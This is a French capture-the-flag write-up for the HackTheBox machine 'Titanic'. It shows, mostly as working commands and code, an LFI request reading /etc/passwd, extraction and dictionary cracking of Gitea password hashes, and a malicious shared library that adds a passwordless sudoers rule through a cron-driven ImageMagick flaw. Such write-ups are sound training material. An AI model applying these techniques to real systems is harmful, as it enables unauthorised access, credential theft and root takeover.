Titanic HackTheBox (WriteUp)

Skills:

Local File Inclusion (LFI)
Gitea Database Extraction
ImageMagick Exploit [ Privilege Escalation ]

Reconnaissance

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS -n -Pn -vvv --min-rate 5000 10.10.11.55 -oG allPorts

Analyse des ports ouverts avec extractPorts:

Utilisation de la fonction extractPorts pour afficher de manière synthétique les ports ouverts et les copier dans le clipboard (22,80)

nmap -sCV -p22,80 10.10.11.55 -oN targeted

On ajoute ensuite l'IP à notre fichier /etc/hosts :

Analyse du port 80 (HTTP)

Analyse du port 80 (HTTP)

Détection des technologies

Avec wappalyzer, on identifie que le site utilise Flask et Python

Local File Inclusion (LFI)

Le site propose une option pour commander un voyage, qui retourne un fichier JSON.

En interceptant la requête avec Burp Suite, on remarque un paramètre download qui permet d'accéder aux fichiers :

/download?ticket=9bff28d2-2f3a-4e5d-8879-576eb1dadf8b.json

On teste une inclusion de fichier :

/download?ticket=/etc/passwd

Avec curl :

curl -s --path-as-is http://titanic.htb/download?ticket=/etc/passwd

On récupère les utilisateurs système, dont developer.

Fuzzing des sous-domaines

On recherche des sous-domaines avec Gobuster :

gobuster vhost -u http://titanic.htb/ --append-domain -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100 -r

On découvre dev.titanic.htb, qu'on ajoute à /etc/hosts.

Exploitation de Gitea

Sur le sous-domaine dev, on trouve une instance Gitea.

Création d'un utilisateur

On trouve un mot de passe stocké en clair (base de donnée):

En explorant la base SQLite de Gitea, on trouve son chemin :

/home/developer/gitea/data/gitea/gitea.db

On s'y connecte :

sqlite3 gitea.db
.tables

Puis on extrait les hashs des mots de passe :

SELECT lower_name, passwd, salt FROM user;

Bruteforce des Salted Hashes

Hash:

e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56|8bf3e3452b78544f8bee9400d6936d34

Salt:

b8dc26d526439f6f2f4523fa8ea522a2

On utilise un script Python pour casser le hash :

import hashlib
import binascii
 
def pbkdf2_hash(password, salt, iterations=50000, dklen=50):
    hash_value = hashlib.pbkdf2_hmac(
        'sha256',
        password.encode('utf-8'),
        salt,
        iterations,
        dklen
    )
    return hash_value
 
def find_matching_password(dictionary_file, target_hash, salt, iterations=50000, dklen=50):
    target_hash_bytes = binascii.unhexlify(target_hash)
    
    with open(dictionary_file, 'r', encoding='utf-8') as file:
        count = 0
        for line in file:
            password = line.strip()
            hash_value = pbkdf2_hash(password, salt, iterations, dklen)
            count += 1
            print(f"Count: {count}: {password}")
            if hash_value == target_hash_bytes:
                print(f"\nFound password: {password}")
                return password
        print("Password not found.")
        return None
 
salt = binascii.unhexlify('8bf3e3452b78544f8bee9400d6936d34')
target_hash = 'e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56'
dictionary_file = '/usr/share/wordlists/rockyou.txt'
find_matching_password(dictionary_file, target_hash, salt)

- Le mot de passe trouvé est 25282528.

On se connecte en SSH :

ssh [email protected]

Flag user.txt :)

Élévation de privilèges

Cron Job - Exploitation d'ImageMagick

Dans /opt/, on trouve un script script.sh exécuté automatiquement

cd /opt/app/static/assets/images
truncate -s 0 metadata.log
find /opt/app/static/assets/images/ -type f -name "*.jpg" | xargs /usr/bin/magick identify >> metadata.log

Ce script shell commence par se déplacer dans le dossier /opt/app/static/assets/images, puis il vide le fichier metadata.log s'il existe. Ensuite, il recherche tous les fichiers .jpg dans ce répertoire et utilise la commande identify d'ImageMagick pour extraire leurs métadonnées (taille, format, profondeur de couleur, etc.). Ces informations sont ensuite enregistrées dans metadata.log. Ainsi, ce script permet de générer un fichier de métadonnées mis à jour pour toutes les images JPG présentes dans le dossier spécifié.

Le script utilise ImageMagick, une version vulnérable.

magicks --version

Exploitation via `LD_PRELOAD`

On crée un fichier a.c :

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("echo 'developer ALL=(ALL) NOPASSWD:ALL' | sudo tee -a /etc/sudoers");
}

Compilation :

gcc -fPIC -shared -o ./libxcb.so.1 a.c -nostartfiles

On l'ajoute au répertoire surveillé et exécutable par ImageMagick. Ensuite, on exécute :

su root

Flag root.txt :)

Mis à jour il y a 8 mois

Ce contenu vous a-t-il été utile ?

Reconnaissance

Analyse du port 80 (HTTP)

Analyse du port 80 (HTTP)

Détection des technologies

Local File Inclusion (LFI)

Fuzzing des sous-domaines

Exploitation de Gitea

Création d'un utilisateur

Bruteforce des Salted Hashes

Hash:

Salt:

- Le mot de passe trouvé est 25282528.

Flag user.txt :)

Élévation de privilèges

Cron Job - Exploitation d'ImageMagick

Exploitation via LD_PRELOAD

Flag root.txt :)

Exploitation via `LD_PRELOAD`